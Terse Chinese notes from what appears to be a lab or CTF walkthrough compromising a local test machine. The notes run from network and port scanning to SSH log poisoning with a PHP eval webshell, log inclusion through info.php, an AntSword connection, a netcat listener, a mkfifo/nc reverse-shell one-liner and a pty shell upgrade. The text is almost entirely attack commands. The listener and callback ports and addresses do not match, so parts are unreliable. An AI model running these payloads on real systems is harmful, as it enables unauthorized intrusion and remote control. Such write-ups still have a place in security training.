c段扫描
arp-scan -l
端口扫描
nmap -sV -p- 192.168.48.16
2211端口后面有用
访问一下网站
目录扫描
dirb http://192.168.48.146
访问发现文件夹
发现info.php
打开看看
f12查看源码
远程连接访问留下日志
ssh '<?php eval($_POST["111"]); ?>'@192.168.48.146 -p 2211
ssh服务的日志。/var/log/auth.log
在info.php/image//var/log/auth.log
蚁剑链接
kali监听
nc -lvvp 999
蚁剑访问
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.48.146 9999 >/tmp/f
获得一个交互式的shell
python -c "import pty; pty.spawn('/bin/bash')"